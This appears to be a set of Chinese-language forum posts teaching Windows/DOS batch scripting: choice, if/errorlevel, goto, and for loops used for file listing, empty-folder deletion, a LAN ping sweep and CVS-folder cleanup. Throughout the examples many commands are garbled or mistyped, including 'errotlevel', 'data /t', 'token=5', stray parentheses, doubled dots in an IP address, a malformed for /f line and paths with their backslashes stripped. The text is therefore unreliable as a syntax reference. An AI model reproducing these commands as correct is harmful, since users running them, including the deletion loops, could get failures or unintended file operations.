确认请按 Y，否请按 N，或者取消请按 C。 [Y,N,C]?

例：test.bat的内容如下（注意，用if
errorlevel判断返回值时，要按返回值从高到低排列）:
@echo off
choice /C dme /M "defrag,mem,end"
if errorlevel 3 goto end
if errorlevel 2 goto mem
if errotlevel 1 goto defrag

:defrag
c:\dos\defrag
goto end

:mem
mem
goto end

:end
echo good bye

此批处理运行后，将显示“defrag,mem,end[D,M,E]?”
，用户可选择d m e
，然后if语句根据用户的选择作出判断，d表示执行标号为defrag的程序段，m表示执行标号为mem的程序段，e表示执行标号为end的程序段，每个程序段最后都以goto
end将程序跳到end标号处，然后程序将显示good
bye，批处理运行结束。

四、for
循环命令，只要条件符合，它将多次执行同一命令。

语法：
对一组文件中的每一个文件执行某个特定命令。

FOR %%variable IN (set) DO command [command-parameters]

%%variable 指定一个单一字母可替换的参数。
(set) 指定一个或一组文件。可以使用通配符。
command 指定对每个文件执行的命令。
command-parameters
为特定命令指定参数或命令行开关。

例如一个批处理文件中有一行:
for %%c in (*.bat *.txt) do type %%c

则该命令行会显示当前目录下所有以bat和txt为扩展名的文件的内容。

批处理示例

1. IF-EXIST

首先用记事本在C:\建立一个test1.bat批处理文件，文件内容如下：

@echo off
IF EXIST \AUTOEXEC.BAT TYPE \AUTOEXEC.BAT
IF NOT EXIST \AUTOEXEC.BAT ECHO \AUTOEXEC.BAT does not exist

然后运行它：
C:\>TEST1.BAT

如果C:\存在AUTOEXEC.BAT文件，那么它的内容就会被显示出来，如果不存在，批处理就会提示你该文件不存在。

接着再建立一个test2.bat文件，内容如下：
@ECHO OFF
IF EXIST \%1 TYPE \%1
IF NOT EXIST \%1 ECHO \%1 does not exist

执行:
C:\>TEST2 AUTOEXEC.BAT
该命令运行结果同上。

说明：
(1) IF EXIST 是用来测试文件是否存在的，格式为
IF EXIST [路径+文件名] 命令
(2)
test2.bat文件中的%1是参数，DOS允许传递9个批参数信息给批处理文件，分别为%1~%9(%0表示test2命令本身)
，这有点象编程中的实参和形参的关系，%1是形参，AUTOEXEC.BAT是实参。

3)
更进一步的，建立一个名为TEST3.BAT的文件，内容如下：

@echo off
IF "%1" == "A" ECHO XIAO
IF "%2" == "B" ECHO TIAN
IF "%3" == "C" ECHO XIN

如果运行：
C:\>TEST3 A B C
屏幕上会显示:
XIAO
TIAN
XIN
如果运行：
C:\>TEST3 A B
屏幕上会显示
XIAO
TIAN

在这个命令执行过程中，DOS会将一个空字符串指定给参数%3。

2、IF-ERRORLEVEL

建立TEST4.BAT，内容如下：
@ECHO OFF
XCOPY C:\AUTOEXEC.BAT D:IF ERRORLEVEL 1 ECHO 文件拷贝失败
IF ERRORLEVEL 0 ECHO 成功拷贝文件

然后执行文件:
C:\>TEST4

如果文件拷贝成功，屏幕就会显示“成功拷贝文件”，否则就会显示“文件拷贝失败”。

IF ERRORLEVEL
是用来测试它的上一个DOS命令的返回值的，注意只是上一个命令的返回值，而且返回值必须依照从大到小次序顺序判断。
因此下面的批处理文件是错误的：
@ECHO OFF
XCOPY C:\AUTOEXEC.BAT D:\
IF ERRORLEVEL 0 ECHO 成功拷贝文件
IF ERRORLEVEL 1 ECHO 未找到拷贝文件
IF ERRORLEVEL 2 ECHO 用户通过ctrl-c中止拷贝操作
IF ERRORLEVEL 3 ECHO 预置错误阻止文件拷贝操作
IF ERRORLEVEL 4 ECHO 拷贝过程中写盘错误

无论拷贝是否成功，后面的：

未找到拷贝文件
用户通过ctrl-c中止拷贝操作
预置错误阻止文件拷贝操作
拷贝过程中写盘错误

都将显示出来。

以下就是几个常用命令的返回值及其代表的意义：
backup
0 备份成功
1 未找到备份文件
2 文件共享冲突阻止备份完成
3 用户用ctrl-c中止备份
4 由于致命的错误使备份操作中止

diskcomp
0 盘比较相同
1 盘比较不同
2 用户通过ctrl-c中止比较操作
3 由于致命的错误使比较操作中止
4 预置错误中止比较

diskcopy
0 盘拷贝操作成功
1 非致命盘读/写错
2 用户通过ctrl-c结束拷贝操作
3 因致命的处理错误使盘拷贝中止
4 预置错误阻止拷贝操作

format
0 格式化成功
3 用户通过ctrl-c中止格式化处理
4 因致命的处理错误使格式化中止
5 在提示“proceed with format（y/n）?”下用户键入n结束

xcopy
0 成功拷贝文件
1 未找到拷贝文件
2 用户通过ctrl-c中止拷贝操作
4 预置错误阻止文件拷贝操作
5 拷贝过程中写盘错误

3、IF STRING1 == STRING2

建立TEST5.BAT，文件内容如下：
@echo off
IF "%1" == "A" FORMAT A:

执行：
C:\>TEST5 A
屏幕上就出现是否将A:盘格式化的内容。

注意：为了防止参数为空的情况，一般会将字符串用双引号（或者其它符号，注意不能使用保留符号）括起来。
如：if [%1]==[A] 或者 if %1*==A*

5、GOTO

建立TEST6.BAT，文件内容如下：
@ECHO OFF
IF EXIST C:\AUTOEXEC.BAT GOTO _COPY
GOTO _DONE
:_COPY
COPY C:\AUTOEXEC.BAT D:\
:_DONE

注意：
(1)
标号前是ASCII字符的冒号":"，冒号与标号之间不能有空格。

(2) 标号的命名规则与文件名的命名规则相同。
(3)
DOS支持最长八位字符的标号，当无法区别两个标号时，将跳转至最近的一个标号。

6、FOR

建立C:\TEST7.BAT，文件内容如下：
@ECHO OFF
FOR %%C IN (*.BAT *.TXT *.SYS) DO TYPE %%C

运行：
C:\>TEST7

执行以后，屏幕上会将C:盘根目录下所有以BAT、TXT、SYS为扩展名的文件内容显示出来（不包括隐藏文件）。

手把手教你写批处理（willsort题注版）

Climbing
兄可谓用心良苦，受其感昭，略紧微薄之力；原文内容一字未易，仅于每段之下另加题注，其文大多非为纠错，多是年来体会，或偶得，或渐悟，未免偏颇；又加近来俗事渐多，闲情愈少，心浮气燥，一蹴而就。义理悖逆，敬请斧正；措辞不当，尚请莫怪。

另，建议Climbing兄取文不用拘泥于国内，此类技术文章，内外水平相差极大；与其修正国内只言片语，不如翻译国外优秀著述。

批处理的介绍

扩展名是bat(在nt/2000/xp/2003下也可以是cmd)的文件就是批处理文件。

==== willsort 题注 ====================================
.bat是dos下的批处理文件
.cmd是nt内核命令行环境的另一种批处理文件
从更广义的角度来看，unix的shell脚本以及其它操作系统甚至应用程序中由外壳进行解释执行的文本，都具有与批处理文件十分相似的作用，而且同样是由专用解释器以行为单位解释执行，这种文本形式更通用的称谓是脚本语言。所以从某个程度分析，batch,
unix shell, awk, basic, perl
等脚本语言都是一样的，只不过应用的范围和解释的平台各有不同而已。甚至有些应用程序仍然沿用批处理这一称呼，而其内容和扩展名与dos的批处理却又完全不同。
========================================================

==== willsort 题注 ====================================
批处理文件中完全可以使用非dos命令，甚至可以使用不具有可执行特性的普通数据性文件，这缘于windows系统这个新型解释平台的涉入，使得批处理的应用越来越“边缘化”。所以我们讨论的批处理应该限定在dos环境或者命令行环境中，否则很多观念和设定都需要做比较大的变动。
========================================================

==== willsort 题注 ====================================
批处理文件(batch file)也可以称之为批处理程序(batch
program)，这一点与编译型语言有所不同，就c语言来说，扩展名为c或者cpp的文件可以称之为c语言文件或者c语言源代码，但只有编译连接后的exe文件才可以称之为c语言程序。因为批处理文件本身既具有文本的可读性，又具有程序的可执行性，这些称谓的界限是比较模糊的。
========================================================

==== willsort 题注 ====================================
纯以dos系统而言，可执行程序大约可以细分为五类，依照执行优先级由高到低排列分别是：DOSKEY宏命令（预先驻留内存），COMMAND.COM中的内部命令（根据内存的环境随时进驻内存），以com为扩展名的可执行程序（由command.com
直接载入内存），以exe位扩展名的可执行程序（由command.com
重定位后载入内存），以bat位扩展名的批处理程序（由command.com
解释分析，根据其内容按优先级顺序调用第2，3，4，5种可执行程序，分析一行，执行一行，文件本身不载入内存）
========================================================

==== willsort 题注 ====================================
AUTOEXEC.BAT为DOS系统的自动运行批处理文件，由COMMAND.COM启动时解释执行；
而在W.x环境中，不仅增加支持了 DOSSTART.BAT, WINSTART.BAT
等许多其它自动运行的批处理文件，对AUTOEXEC.BAT
也增加了 .DOS .W40 .BAK .OLD .PWS
等许多变体以适应复杂的环境和多变的需求

comp...@gmail.com

unread,

Jan 24, 2006, 2:10:46 PM1/24/06

to cfans--技巧,优化,有趣

For命令在Windows中的妙用

　　在Windows中，我们经常要批量地来完成相同的工作，很多用户往往是上网搜索第三方软件来完成。其实在Windows中，巧妙地利用For命令就可以很轻松地完成很多批量工作。为了更好地理解我们的下一步实战，先让我们来看一下For命令的用法。For命令的具体格式如下:

　　For %variable IN (set) do command [command-parameters],

　　%variable——指定一个单一字母可替换的参数

　　(set)——指定一个或一组文件，可以使用通配符

　　command——指定对每个文件执行的命令

　　command-parameters——为特定命令指定参数或命令行开关

　　在批处理文件中使用 For
命令时，指定变量请使用“%%variable”，而不要用“
%variable”。变量名称是区分大小写的，所以“%i”不同于“%I”。由于For命令的用法和参数非常多，变化复杂，这里因篇幅原因就不再一一罗列了，用户可以在命令提示符后键入“For
/?”来获得具体帮助。下面我们将直接进入实战，并结合实战讲述For命令的具体用法。

　　1．给文本文件批量加上落款

　　在很多情况下，我们编辑处理完文档，都要给文件加上一个包括“通信地址、QQ、E-MAIL等等信息”的落款，如投往编辑部的稿件。如果只有一篇文章，直接输入倒也罢了，但假如你有很多这样的文件，该怎么办呢？难道每一篇稿件都要手工一个字一个字地输入那一成不变的落款吗？NO！完全没有必要这样费神，我们可以一次性地给所有文件添加上落款，假如我们要给放在“ABCDE”目录下的所有文本文件加上落款。那么就请先建一个名为Address.txt的文本文件，录入通信地址、QQ、E-mail等等信息,保存到E盘的根目录。

　　再新建一个文本文件，录入以下内容：

　　MD E:\TEMPabcde

　　for /r E:\ABCDE %%I in (*.txt) do copy %%I+E:\address.txt
E:\tempABCDE\

　　for /r E:\tempABCDE %%I in (*.txt) do copy %%I E:\ABCDE\

　　echo y|del E:\TEMPabcde

　　echo y|rd E:\TEMPabcde

　　录入完毕，经检查确认无误后，另存为“给文件加落款.bat”，也保存到E盘的根目录。现在，只需双击此批处理文件，就可以为E:\ABCDE文件夹中所有的TXT文件加上落款。

　　晨风提示：For命令指定参数“%I”从“E:\ABCDE”文件夹中的所有文本文件中取值
；“/r”参数表示包括子目录。

　　2．批量获取文件列表

　　如果我们需要制作某个目录下的文件清单，如电影文件的文件清单，可以用For命令来轻松完成。我们以制作F盘上的所有RM格式的电影文件的清单为例：

　　先在F盘根目录下建一个名为“列文件清单.bat”的文本文件，然后输入以下内容并保存：

　　For /r F:\ %%i in (*.rm) DO @echo %%~fi >>F:\RMList.txt

　　双击此批处理文件，即可快速列出F盘上所有的以RM为扩展名的电影文件的清单。

　　晨风提示：For命令指定参数“％i”从F盘的所有以RM为扩展名的文件中取值；“＠echo
％％fi”表示将所有的RM文件及其完整路径显示出来；“＞＞F＼RMList．txt”表示将输出结果重定向到F＼RMList．txt文件中，打开该文件，即可看到详细的目录清单；“f”表示完整路径。还可以使用“％n”（文件名）、“％x”（文件扩展名）、“％d”（驱动器）、“％p”（路径）、“％s”（完整路径）、“％t”（文件日期）、“％z”（文件大小）等参数。

　　3．快速删除磁盘上的空文件夹

　　假设我们要清理D盘上的空文件夹，那么请先用记事本建一个名为“kill.bat”的文件，在该文件中输入以下内容：

　　dir d:\ /ad /b /s |sort /r >>d:\kill.txt

　　For /f %%i in (d:\kill.txt) DO rd %%i

　　echo y |del d:\kill.txt

　　先查找并删除全部“Thumbs.db”文件，然后双击该文件，D盘上所有的空文件夹很快就消失的无影无踪了。

　　晨风提示：“dir
d:\”表示列D盘上的所有目录包括子目录列表,其中参数“/ad”表示列所有目录；参数“/b”表示只列出文件夹名称而不显示标题信息或摘要：参数“/s”表示搜索,即查找D盘中的所有文件夹和子文件夹；“|”是管道符号，将Dir命令的结果传递给“sort”命令；“sort”命令表示排序；“/r”表示逆序列排序。之所以要逆序列排序，是因为通过逆序列排序后，D盘上的所有子文件夹总是会位于其父文件夹的前面，这样在用For命令删除空文件夹时，空的子文件夹被首先删除了，因此空的父文件夹就可以删除了。否则，因空的父文件夹中尚有空的子文件夹，会造成无法删除的情况。“>>d:\kill.txt”的作用是让屏幕回显重新定位到“d:\kill.txt”文件中。

　　For
命令中参数“/f”的作用是让For命令从指定的文件中读取数据作为变量，示例是从Dir的结果文件“d:\kill.txt”文件中读取数据，每次读取一行传递给RD命令；RD命令的作用是删除由For命令传递过来的每一个文件夹，因RD命令无法删除尚有内容的文件夹，所以经过For命令的循环后，只是删除了所有的空文件夹，有内容的文件夹会完好无损地被保留下来。

　　4．
批量获取局域网中所有IP地址与主机名的对应关系

　　如果你是网管,肯定需要获取一张本网段内所有IP地址与主机名的对照表。如果你不想使用第三方软件的话，不妨用For命令试试。

　　在命令提示符窗口中输入以下命令：

　　For /L %i in (0,1,254) DO ping -a -n 1 192.168..0.%i |Find /i
"reply" >>E:\IPAddress.txt

　　好了，等命令执行完毕，打开“E:\IPAddress.txt”文件，一张完整的IP与主机名的对照表已经初步形成了，你只需作简单的编辑修改即可打印输出了。

　　晨风提示：For命令指定参数“%i”从0开始，每次增加1，直到254为止，即一个C类网段的全部地址。如果用户的局域网自行定义的了IP地址，应根据实际情况设置，如可以为“172.16.0”；“-a”表示获取主机名；“-n
-1”表示回显的次数为1次，默认情况下为4次；Find /i
"reply“表示查找已响应的主机，即已ping通的主机；“E:\IPAddress.txt”表示将屏幕回显内容输入到“:\IPAddress.txt”文件中

comp...@gmail.com

unread,

Jan 24, 2006, 2:23:28 PM1/24/06

to cfans--技巧,优化,有趣

史上最强的DOS命令-"FOR"-高级应用范例

以前常觉得DOS的命令行功能太弱,无法象UNIX一样可以用命令行完成非常复杂的操作.实际上,当MS从WIN2K开始将命令行增强以后,已经借鉴了相当多的UNIX的优点,虽然还无法做到象UNIX那么灵活,但已经可以完成绝大多数的任务,比如用&&和||(或更多)命令,又前一举个例子,用适当的参数,可用FOR命令将date/t
的输出从"Sat
07/13/2002"变成你想要的格式,比如,"2002-07-13":
C:>for /f "tokens=2,3,4 delims=/ "%a in ('date /t') do @ echo %c-%a-%b
2002-07-13

该例将在(3)中详细说明.

1、基本应用

简单说，FOR是个循环，可以用你指定的循环范围生成一系列命令。最简单的例子，就是人工指定循环范围，然后对每个值执行指定的命令。例如，想快速报告每个硬盘分区的剩余空间：

for %a in ( c: d: e: f do @dir %a | find "bytes free"

将输出：
8Dir(S)1,361,334,272 bytes free
15 Dir (s) 8,505,571,567,bytes free
12 Dir (s) 12,975,149,056,bytes free
7 Dir (s) 11,658,854,400 bytes free

用它可以使一些不支持通配符的命令对一写列文件进行操作。在WIN9X中，TYPE命令（显示文件内容）是不支持*.txt这种格式的（WIN2K开始TYPE已支持通配）。遇到类似的情况就可以用FOR：

for %a in (*.txt) do type %a

这些还不是FOR最强大的功能。我认为它最强大的功能，表现在以下这些高级应用：
1.可以用/r 参数遍历整个目录书
2.可以用/f 参数将文本文件内容作为循环范围
3.可以用/f 参数将某一命令执行结果做为循环范围

4.可以用%~操作符号将文件名分离成文件名、扩展名、盘符等独立部分

现分别举例说明如下：
1.用/r 遍历目录树

当用*.*或*.txt 等文件名通配符号作为 for /r
的循环范围时，可以对当前目录下所有文件（包括子目录里面的文件）进行操作。举个例子，你想在当前目力的所有txt文件（包括子目录）内容中查找“bluebear”的字样，但由于find
本身不能遍历子目力，所以我们用for：

for /r . %a in (*.txt) do @ find "bluebesr" %a

find前面的@只是让输出结果不包括 find
命令本身。这是DOS很早就有的功能。和FOR无关。

但用.作为循环范围时，for
只将子目录的结构（目录名）作为循环范围，而不包括里面的文件。有点像
TREE 命令，不过侧重点不同。TREE
的重点是很漂亮易读的格式输出，而FOR
的输出适合一些自动任务，例如，我们都知道用CVS管理的项目中，每个子目录下都会有一个CVS目录，有时在软件发行时我们想把这些CVS目录全部去掉：

for /r .%a in (.) do @if exist %a CVS rd /s /q %aCVS

先用 if exist 判断一下，是因为 for
只是接写的对每个目录进行例举，如果有些目录下面没有CVS也会被执行。用
if exist 判断一下比较安全。
这种删除命令威力太大，请小心使用。最好是在真正执行以上删除命令前，将
rd /s /q 换成 @echo
先列出要删除的目录，确认无误后在换回rd /s /q ：

for /r . %a in (.) do @if exist %CVS @echo %CVS

可能目录中会多出一层“.”，比如C:\proj
elease.CVS，但不会影响命令的执行效果。

2.将某一文件内容或命令执行结果作为喜欢范围：

假如你有一个文件
todel.txt，里面是所有要删除的文件列表，现在你想将里面列出的每个文件都删掉。假设这个文件是每个文件占一行，想这样：

c:empa1.txt
c:empa2.txt
c:empsubdir3.txt
c:empsubdir4.txt
那么可以用FOR来完成：

for /f %a in (todel.txt) do del %a

这个命令还可以更强大。比如你的todel.txt并不是象上面例子那么干净，而是有DIR直接生成，有一些没用的信息，比如这样：

Volume in drive D is DATA
Volume Serial Number is C47C-9908

Directory fo D: mp

09/26/2001 12:50 PM 18,426 alg0925.txt
12/02/2001 04:29 AM 795 bsample.txt
04/11/2002 04:18 AM 2,043 invitation.txt
4 File(s) 25,651 bytes
0 Dir(s) 4,060,700,672 bytes free

for 仍然可以解出其中的文件名进行操作：

for /f "skip=5 token=5" %a in (todel.txt) do @if exist %a DEL %a
当然，上面这个命令是在进行删除，如果你想看看哪些文件将被操作，把DEL换成echo：

for /f "skip=5 tokens=3)%a in (token.txt) do @if exist %a echo %a

你将看到：

alg0925.txt
bsample.txt
invitation.txt

skip=5
表示跳过前5行（就是DIR输出的头部信息），tokens=5表示将每行的第5列作为循环值放入%a，正好是文件名。在这里我加了一个文件存在判断，是因为最后一行的"free"
刚好也是第5列，目前还想不出好的办法来滤掉最好两行，所以检查一下可保万无一失。

3.可以用/f 参数将某一命令执行结果作为循环范围

非常有用的功能。比如，我们想知道目前的环境变量有哪些面子（我们只要名字，不要值）。可是SET命令的输出是“名字=值”的格式，现在可以用FOR来只取的名字部分：

for /f "delims==" %i in ('set') do @echo %i

将看到

Allusersprofile
Appdata
Classpath
CommonProgramFiles
Computername
VomSpec
Dircmd
Homedrive
……

这是是将set命令执行的结果来作为循环范围。delims==表示用=作为分隔符，由于for
/f
默认是用每行第一个token，所以分离出变量名。如果想仅列出值：

for /f "delims== tokens=2" %i in ('set') do @echo %i

tokens=2和前例想同，表示将第二列（由=作为分隔符）作为循环值。

再来个更有用的例子：

我们知道 data /t
（/t表示不要询问用户输入）的输出是象这样的：

Sat 07/13/2002

现在我想分离出日期部分，也就是13：

for /f "tokens=3 delims=/" %a in ('data /t') do @echo %a

实际上把tokens后面换成1、2、3或4，你将分别得到Sat、07、13和2002。注意delims=/后面还有个空格，表示/和空格都是分隔符。由于这个空格delims必须是/f选项的最后一项。

再灵活一点，象本文开头提到的，将日期用2002-07-13个格式输出：

for /f "tokens=2,3,4 delims=/ " %a in ('data /t') do @echo %c-%a-%b

当tokens后跟多个值时，将分别映射到%a,%b,%c等。实际上跟你指定的变量有关，如果你指定的是
%i，他们就会用%i，%j，%k等。
灵活应用这一点，几乎没有做不了的事。

4.可以用%~操作符将文件名分离成文件名、扩展名、盘符等独立部分

这个比较简单，就是说将循环变量的值自动分离成只要文件名，只要扩展名，或只要盘符等等。

例：要将 c:mp3下所有mp3的歌名列出，如果用一般的 dir
/b/s或 for /r，将会是这样：

g:mp3Archived -18-01-A游鸿明-下沙游鸿明-01 下沙.mp3
g:mp3Archived -18-01-A游鸿明-下沙游鸿明-02 21个人.mp3
......
g:mp3Archived -18-01-A王菲-寓言王菲-阿修罗.mp3
g:mp3Archived -18-01-A王菲-寓言王菲-彼岸花.mp3
g:mp3Archived -18-01-A王菲-寓言王菲-不爱我的我不爱.mp3
.....

如果我只要歌名（不要路径和“.mp3”）：

游鸿明-01 下杀
游鸿明-02 21个人
……
王菲-阿修罗
王菲-彼岸花
王菲-不爱我的我不爱
……

那么可以用FOR命令：

for /f g:mp3 %a in (*.mp3) do @echo %~na

凡是%~na
开头的操作符，都是文件名的分离操作。具体请看 for
/? 帮助。

Reply all

Reply to author

Forward

0 new messages